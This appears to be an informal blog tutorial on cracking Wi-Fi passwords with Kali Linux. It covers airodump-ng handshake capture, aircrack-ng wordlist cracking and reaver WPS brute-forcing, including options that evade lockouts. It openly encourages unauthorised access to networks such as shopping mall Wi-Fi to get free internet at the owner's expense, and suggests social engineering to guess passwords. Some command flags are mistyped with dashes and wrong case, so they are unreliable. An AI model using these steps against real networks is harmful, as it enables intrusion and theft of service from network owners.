WIFI Hacking
Hello guys, Hope you are doing well.
Most of the time people asking the same question to me “How
to hack WI-FI”
So, this article dedicated to them.
First of all our requirement for hack a Wi-Fi network.
·
Kali linux
·
Wi Fi adaptor ( if your laptop’s Wi Fi does not
support monitor mode. Ref: kali.org/
·
A word list or a password file. It’s like a txt file with some common words using
for as password. Best is create your own password file using Crunch.
Now we have all these things. One more thing that we need is
“A working Brain” :P
Okis, now start.
First of all check the Wi Fi connection, using this command.
#ifconfig
You will see a network adaptor like WLAN0 or Wlan1 or wlan2
(depends)
Now, #ifconfig
wlan0 up (In my case, my Wi Fi is wlan0)
Its time to scan the
available Wi Fi networks. We can use two
different tools for that. First is ‘Kismet’ & second it ‘Iwlist’ here we’re
using Iwlist.
Type #
iwlist wlan0 scanning
It will print all available network with their MAC address
& Channel no.
Select the network that you want to hack. Copy the SSID
name, MAC address, Channel no. to a notepad
Now, put the WI FI adaptor in monitor mode. Use #airmon-ng start wlan0 ,
run ifconfig to confirm(you will see a new WI FI adaptor as mon0
Time to capture the Handshakes. Handshake is a file which
have the password information. Here we’re using airodump to capture the valid
handshakes.
Use #airodump-ng
mon0 –bssid aa:bb:cc:dd:ee –channel 1 –write key
Wait until we found a valid handshake, it takes up to 45
minutes. When it show the valid handshake found, press ctrl+c to terminate job. Now we have the capture file named key.cap
Here we need a word dictionary 0r wordlist to crack the
password, PS: Password will only crack it the wordlist have the password as
plain text. Better to use own wordlist.(do social engineering for password
guessing & use Crunch to create own wordlist)
Time to run password cracker. Here we using Aircrack, its best tool ever to
crack WI FI password.
Run # aircrack-ng
/root/key.cap -w /root/wordlist/z3r0.lst
Wait for the password cracked. If password is cracked it
will show the password in plain text.
If WPS enabled in WI FI
Most of shopping mall have their own WI FI zones, but they
protect them using wpa2Psk, so its hard to crack them all. But they do a big
mistake they enable the WPS connection on & it’s like a Jackpot for whom
who want to hack WI FI & use free internet (bill paid by WI FI zone owner)
.
Reaver is best tool to crack
a WI FI network with WPS enable.
Normally we can use this command :
#reaver
–I mon0 –c 1 -b aa:bb:cc:dd:ee –vv
But some time admin block the continues request of WPS, so
here we use this command:
#reaver
–I mon0 –c 6 –b aa:bb:cc:dd:ee –vv –L –N –d 15 –T .5 –r 3:15
Details:
I :
interface
C : channel
B :
Broadcast address (mac address of WI FI router)
L :
Ignored locked WPS status
N : Don’t
send NACK packet when errors are detected
D : delay
(-d 15= delay 15 seconds between PIN attempts)
T :
timeout period (-t .5 = for halfsecond timeout)
R : rest
(-r 3:15 = after 3 attempts, sleep for 15 seconds)